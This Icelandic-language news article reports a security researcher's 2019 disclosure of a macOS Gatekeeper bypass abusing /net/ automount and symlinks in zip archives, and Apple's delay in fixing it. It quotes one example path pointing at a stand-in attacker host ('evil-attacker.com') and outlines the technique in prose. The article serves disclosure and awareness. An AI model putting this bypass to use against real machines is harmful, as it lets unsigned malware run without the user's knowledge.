Það er auðvelt að setja upp skaðlegt forrit á Mac. Apple hefur ekki lagað villuna jafnvel eftir þrjá mánuði

27. 5. 2019

Öryggisrannsakandi Filippo Cavallarin birti viðvörun um villuna í macOS 10.14.5 á blogginu sínu. Þetta felur í sér möguleikann á að fara algjörlega framhjá öryggisráðstöfunum Gatekeeper. Samkvæmt Cavallarin benti hann Apple á villuna þegar í febrúar á þessu ári, en fyrirtækið lagaði hana ekki í nýjustu uppfærslunni.

Gatekeeper var þróað af Apple og var fellt inn í skjáborðsstýrikerfi þess í fyrsta skipti árið 2012. Það er vélbúnaður sem kemur í veg fyrir að forrit keyri án vitundar og samþykkis notandans. Eftir að þú halar niður forriti athugar Gatekeeper kóðann sjálfkrafa til að sjá hvort hugbúnaðurinn sé rétt undirritaður af Apple.

Í bloggfærslu sinni tekur Cavallarin fram að Gatekeeper, sjálfgefið, lítur á bæði ytri geymslu og nethlutdeild sem örugga staði. Því er hægt að ræsa hvaða forrit sem er í þessum skotmörkum sjálfkrafa án þess að þurfa að fara í gegnum hliðvörðinn. Það er þessi eiginleiki sem hægt er að nýta til að ræsa skaðlegan hugbúnað án vitundar notandans.

Einn þáttur sem leyfir óviðkomandi aðgang er sjálfvirka festingareiginleikinn, sem gerir notendum kleift að tengja sjálfkrafa nethlutdeild einfaldlega með því að tilgreina slóð sem byrjar á "/net/". Sem dæmi nefnir Cavallarin slóðina "ls /net/evil-attacker.com/sharedfolder/" sem getur valdið því að stýrikerfið hleður innihaldi "sharefolder" möppu á afskekktum stað sem getur verið illgjarn.

Þú getur horft á hvernig ógnin virkar í myndbandinu:

Annar þáttur er sú staðreynd að ef zip-skjalasafn sem inniheldur tiltekinn sammerkt tengil sem leiðir til sjálfvirkrar festingar er deilt, verður það ekki athugað af Gatekeeper. Þannig getur fórnarlambið auðveldlega hlaðið niður illgjarna skjalasafninu og pakkað því niður, sem gerir árásarmanninum kleift að keyra nánast hvaða hugbúnað sem er á Mac án vitundar notandans. Finder, sem felur ákveðnar viðbætur sjálfgefið, hefur einnig sinn hluta af þessu varnarleysi.

Cavallarin segir á bloggi sínu að Apple hafi vakið athygli á varnarleysi macOS stýrikerfisins 22. febrúar á þessu ári. En um miðjan maí hætti Apple að eiga samskipti við Cavallarin, svo Cavallarin ákvað að gera allt opinbert.

Heimild: FCVL

Efni: geymsla, sjálfkrafa, MacOS, video, Stillingar, virka, notandi, Umsókn, Apple

Umfjöllun um greinina

Nafn þitt

Athugasemd þín

Með því að fylla út ofangreind gögn, viðurkenni ég að fyrirtækið TEXT FACTORY s.r.o., með skráða skrifstofu í Brno, Durďákova 336/29, Černá Pole, Póstnúmer: 613 00, kennitala: 06157831, skráð við Héraðsdómstólinn í Brno . f) GDPR og til að uppfylla lagalegar skyldur (100399. mgr. 6. gr., c-lið GDPR), í eftirfarandi tilgangi: nauðsyn þess að tryggja heimild gesta á vefsíðum sem reknar eru af TEXT FACTORY s.r.o. til að leggja virkan þátt í birtar greinar eða innan umræðu. málþing og nýta réttindi TEXT FACTORY s.r.o. sem stjórnanda þessara umræðuspjalla. Frekari upplýsingar um vinnslu persónuupplýsinga og réttindi er að finna í Kennsla um persónuvernd. allan textann

Það gæti verið vekur áhuga þinn

Tengt